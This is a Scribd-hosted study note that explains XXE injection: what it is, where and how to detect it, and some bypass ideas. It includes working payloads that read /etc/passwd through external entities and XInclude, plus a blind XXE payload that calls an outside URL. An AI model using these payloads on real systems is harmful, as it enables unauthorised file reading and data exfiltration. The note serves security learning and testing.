Scribd
Upload
23 views4 pages

XXE

explain XXE injection

Uploaded by

ahmed.m.abd.elftah.abbas
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
23 views4 pages

XXE

explain XXE injection

Uploaded by

ahmed.m.abd.elftah.abbas
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

XXE

# XXE >> server side attack

# used to provide information about a document

# tag and data define by user

# SPA >> single page application >> API

# XML = SOAP
# REST API = JSON

1. Brief Description

 Definition: XXE is an attack that exploits XML


parsers that improperly process external entities.
 Impact: Allows attackers to read local files,
execute remote requests, and in some cases,
execute code or cause Denial of Service (DoS).
 Common Targets: Systems accepting XML input,
including web services, SOAP APIs, and XML-based
file uploads.

2. Where to Detect
 User Inputs: Forms or fields accepting XML input.
 File Uploads: Systems allowing XML file uploads.
 APIs: SOAP or REST APIs using XML.
 Document Processing: Applications that process
XML documents, including Office files and SVGs.
 Configuration Files: Any place where XML
configuration files are processed.

3. How to Detect

Manual Inspection:

 Look for XML parsers that support external


entities.
 Check for DTD (Document Type Definition) in XML
files.

Automated Scanning:

 Use tools like Burp Suite, OWASP ZAP with XXE


detection capabilities.

Fuzzing:

 Inject XXE payloads in XML inputs.

Static Code Analysis:

 Scan code for XML parsers that do not disable


external entities.
Penetration Testing:

 Test API endpoints and file uploads with crafted


XML payloads.
 ===============================
==============

Basic Payloads:

Read local files :


<!DOCTYPE foo [<!ENTITY foo ANY> <!ENTITY xxe
SYSTEM "file:///etc/passwd"> ]>
<foo> &xxe; </foo>

Blind XXE :
<!DOCTYPE foo [<!ENTITY foo ANY> <!ENTITY xxe
SYSTEM "http://web.com"> ]>
<foo> &xxe; </foo>

<foo
xmlns:xi="http://www.w3.org/2001/XInclude"><xi:inclu
de parse="text" href="file:///etc/passwd"/></foo>

5. Defense Bypass Techniques


Encoding:

 Encode payloads to bypass filters.

Chained Attacks:

 Combine XXE with other vulnerabilities like SSRF


or RCE.

Out-of-Band (OOB):

 Use external servers to capture exfiltrated data.

Conditional Execution:

 Use conditional entities to bypass detection


mechanisms.

You might also like